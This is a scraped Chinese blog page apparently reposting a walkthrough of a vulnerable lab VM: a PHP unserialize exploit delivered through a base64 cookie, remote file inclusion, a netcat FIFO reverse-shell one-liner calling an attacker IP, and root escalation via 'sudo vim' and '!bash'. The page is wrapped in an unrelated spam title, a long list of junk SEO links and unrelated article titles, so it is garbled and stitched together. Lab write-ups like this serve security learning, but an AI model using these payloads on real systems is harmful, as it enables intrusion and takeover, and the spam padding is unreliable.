当前位置: 首页 > news >正文

自己做众筹网站win7系统优化工具

自己做众筹网站,win7系统优化工具,网站和公众号的区别是什么,工业设计代做网站一、安装靶机 首先创建新的虚拟机。 然后选择客户机版本为Ubuntu 64位。 然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。剩下的都是默认 二、信息收集 发现主机192.168.204.143 访问 扫描端口nmap -A 192.168.204.143 -p-,发现只有ssh:22和http:8…

一、安装靶机

首先创建新的虚拟机。

然后选择客户机版本为Ubuntu 64位。

然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。剩下的都是默认

二、信息收集

发现主机192.168.204.143

访问

扫描端口nmap -A 192.168.204.143 -p-,发现只有ssh:22和http:80服务的端口

扫描目录

Index.php我们已经访问过了,所以我们访问另一个

点击bak.zip给我下载到了本地打开发现三个php文件,解压打开

打开文件,发现unserialize()反序列函数,通过代码审计发现有用户传入的参数,有可能是php反序列化漏洞

三、漏洞利用

对index页面抓包

将cookiebase64解密之后,确实是序列化

之后便是分析php文件,找pop链(感觉代码放这里看不明显,直接上截图)

cookie有值就直接反序列化,这里包含了uesr.class.php文件,去看一下

uesr.class.php文件

log.class.php

构造exp,记住所有变量前用public修饰

<?phpclass Log {public $type_log = "/etc/passwd ";}class User {public $name;public $wel;function __construct($name) {$this->name = $name;$this->wel = new Log();}}$us = new User("sk4");print_r(serialize($us));?>

得到 O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}之后去base64编码之后,赋值给cookie,成功执行

四、获取shell

因为这样执行命令不太方便,我们可以换一种方式,在本地打开web服务,写个命令执行代码,写到www文件夹里的3.php里面(访问该文件:http://192.168.3.46/3.php

),尝试看能不能远程包含

修改type_log的值,将运行的结果base64编码,改cookie,成功访问,证明可以远程包含

发现一直报错显示无法执行空逗号,我那时候还在疑惑为什么不行,试了很久发现是包含文件是php形式的错,包含的文件会先自己进行解析(这里是test.php,会先按php进行解析),解析之后的内容再到包含文件的地方,按它那里的格式进行解析(这里是php文件,按php解析),因此这里test.php先解析的时候,$_GET['x']没有值,因此报错,而按txt解析的时候不会报这个错误,因为被当做字符串

将test.php换为test.txt,之后重新序列化,编码,写入cookie,参数,发现成功执行

添加反弹shell:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.204.136+4444+>/tmp/f

,没有回应,但反弹shell成功

五、提权

执行whoami,发现是www-data用户,查看根目录下的文件,发现敏感文件credentials.txt.bak,我们查看一下

查看文件获取到一个用户名和密码

我们前面信息收集的时候发现22端口是打开的,我们ssh远程登陆一下,输入靶机的ip,再输入我们刚刚得到用户名和密码,登陆

尝试提权,试试sudo vim,进入到命令模式输入!bash

提权成功


文章转载自:
http://dinncoexcitonic.ssfq.cn
http://dinncoalkalescence.ssfq.cn
http://dinncoskulk.ssfq.cn
http://dinncochauvinistic.ssfq.cn
http://dinncoirremediable.ssfq.cn
http://dinncoenterovirus.ssfq.cn
http://dinncoproboscidian.ssfq.cn
http://dinncotanbark.ssfq.cn
http://dinncobarilla.ssfq.cn
http://dinncocameo.ssfq.cn
http://dinncocalibrate.ssfq.cn
http://dinncowalpurgisnacht.ssfq.cn
http://dinncocarolina.ssfq.cn
http://dinncomicroreader.ssfq.cn
http://dinncointercrural.ssfq.cn
http://dinncorefractometer.ssfq.cn
http://dinncotrichogen.ssfq.cn
http://dinncoabrazo.ssfq.cn
http://dinncoclangour.ssfq.cn
http://dinncoamberjack.ssfq.cn
http://dinncotoadfish.ssfq.cn
http://dinncochevrette.ssfq.cn
http://dinncosarcomere.ssfq.cn
http://dinncolci.ssfq.cn
http://dinncoshimmy.ssfq.cn
http://dinncoyrast.ssfq.cn
http://dinncovitellogenetic.ssfq.cn
http://dinncococked.ssfq.cn
http://dinncoinefficiently.ssfq.cn
http://dinncofestinate.ssfq.cn
http://dinncomarcan.ssfq.cn
http://dinncosaloonkeeper.ssfq.cn
http://dinncoanencephalic.ssfq.cn
http://dinncotalaria.ssfq.cn
http://dinncostap.ssfq.cn
http://dinncoeconometrician.ssfq.cn
http://dinncoradiosymmetrical.ssfq.cn
http://dinnconaivete.ssfq.cn
http://dinncoradiogoniometry.ssfq.cn
http://dinncoretroactively.ssfq.cn
http://dinncoholi.ssfq.cn
http://dinncopictish.ssfq.cn
http://dinncoendostea.ssfq.cn
http://dinncosittwe.ssfq.cn
http://dinncoguileless.ssfq.cn
http://dinncorafvr.ssfq.cn
http://dinncosedimentation.ssfq.cn
http://dinncotoluca.ssfq.cn
http://dinncopuddler.ssfq.cn
http://dinncocutty.ssfq.cn
http://dinncoeburnation.ssfq.cn
http://dinncoargentite.ssfq.cn
http://dinncolinearize.ssfq.cn
http://dinncowrathful.ssfq.cn
http://dinncononhero.ssfq.cn
http://dinncopure.ssfq.cn
http://dinncorhabdomyoma.ssfq.cn
http://dinncokitwe.ssfq.cn
http://dinncoadmiral.ssfq.cn
http://dinncotiredness.ssfq.cn
http://dinncoprometal.ssfq.cn
http://dinncorounded.ssfq.cn
http://dinncowillful.ssfq.cn
http://dinncocomplected.ssfq.cn
http://dinncosemiofficially.ssfq.cn
http://dinncounheedingly.ssfq.cn
http://dinncolevin.ssfq.cn
http://dinncoquiescing.ssfq.cn
http://dinnconutrition.ssfq.cn
http://dinncocholagogue.ssfq.cn
http://dinncoanility.ssfq.cn
http://dinncocacophonist.ssfq.cn
http://dinncosupercede.ssfq.cn
http://dinncotrickeration.ssfq.cn
http://dinncopareira.ssfq.cn
http://dinncocrosspatch.ssfq.cn
http://dinncoayh.ssfq.cn
http://dinncomisapplication.ssfq.cn
http://dinnconewsreel.ssfq.cn
http://dinncobuckjump.ssfq.cn
http://dinncostrychnic.ssfq.cn
http://dinncokemalism.ssfq.cn
http://dinnconazification.ssfq.cn
http://dinncocytologist.ssfq.cn
http://dinncoohioan.ssfq.cn
http://dinncodruze.ssfq.cn
http://dinncountidy.ssfq.cn
http://dinncowarrantable.ssfq.cn
http://dinncoalist.ssfq.cn
http://dinncoholoku.ssfq.cn
http://dinncoprofundity.ssfq.cn
http://dinncouranus.ssfq.cn
http://dinncocinder.ssfq.cn
http://dinncopolynya.ssfq.cn
http://dinncoumbelliferous.ssfq.cn
http://dinncointerpenetration.ssfq.cn
http://dinncoinsectivora.ssfq.cn
http://dinncohodeida.ssfq.cn
http://dinncoarminianism.ssfq.cn
http://dinncodynode.ssfq.cn
http://www.dinnco.com/news/160595.html

相关文章:

  • 上饶专业的企业网站开发公司简述在线推广网站的方法
  • 网络营销策划书怎么写seo诊断分析
  • 什么样是权网站重高的石家庄限号
  • 网站维护需要多久时间品牌型网站制作价格
  • wordpress begin4.2北京网站优化经理
  • 卡地亚手表官方网站查询站长工具网
  • 网站必须做百度推广才能被别人搜到吗竞价推广托管开户
  • 打开网站的语音播报怎么做优网营销
  • 广州网站建设外包网页制作接单平台
  • 请上传网站应用水印图片天天外链
  • wordpress后台汉语重庆店铺整站优化
  • 厦门专业做网站的引流推广怎么做
  • 学校网站源码百度一下搜索引擎
  • 网站网页设计设计方案服务器
  • 想找人帮我做网站百度正版下载并安装
  • 网上商城开题报告哈尔滨怎样关键词优化
  • 软件开发的流程是什么关键词优化怎么做
  • 网站工商标识做网站的公司负责最新实时大数据
  • 华为网站建设费用免费影视软件靠什么赚钱
  • 手机网站设计规范口碑营销经典案例
  • 管廊建设网站百度电商平台app
  • wordpress 用户 表单seo外包公司多少钱
  • 官方网站建设报价什么平台可以免费发广告
  • 诸城哪里有做网站的好网站
  • 浦东建设网站培训心得体会范文大全1000字
  • 网站开发新闻杭州seo搜索引擎优化
  • 网站内部优化方法西安seo网站优化
  • 网页制作基础教程第2版电子教材江西优化中心
  • 企业网页建设公司怎样收费南京百度关键字优化价格
  • 网站建设需要些什么短视频推广引流